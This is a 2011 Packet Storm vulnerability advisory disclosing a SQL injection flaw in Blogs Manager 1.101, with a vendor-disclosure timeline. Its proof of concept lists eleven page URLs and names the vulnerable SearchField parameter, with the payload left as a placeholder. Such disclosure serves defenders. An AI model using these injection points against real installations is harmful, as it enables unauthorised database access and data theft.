Blogs Manager 1.101 SQL Injection

2011-11-19T00:00:00
ID PACKETSTORM:107137
Type packetstorm
Reporter muuratsalo
Modified 2011-11-19T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Blogs manager <= 1.101 SQL Injection Vulnerability  
------------------------------------------------------------------------  
  
author............: muuratsalo (Revshell.com)  
contact...........: muuratsalo[at]gmail[dot]com  
download..........: http://sourceforge.net/projects/blogsmanager/  
  
  
[0x01] Vulnerability overview:  
  
Blogs manager <= 1.101 is affected by a SQL injection vulnerability.  
Note - A registered account could be required to exploit the vulnerability.  
  
  
[0x02] Disclosure timeline:  
  
[16/11/2011] - SQL injection vulnerability discovered and reported to  
the vendor.  
[19/11/2011] - No response from the vendor, public disclosure.  
  
  
[0x03] Proof of Concept:  
  
http://localhost/blogs/_authors_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]  
http://localhost/blogs/_blogs_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]  
http://localhost/blogs/_category_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]  
http://localhost/blogs/_comments_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]  
http://localhost/blogs/_policy_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]  
http://localhost/blogs/_rate_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]  
http://localhost/blogs/categoriesblogs_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]  
http://localhost/blogs/chosen_authors_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]  
http://localhost/blogs/chosen_blogs_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]  
http://localhost/blogs/chosen_comments_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]  
http://localhost/blogs/help_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]  
  
`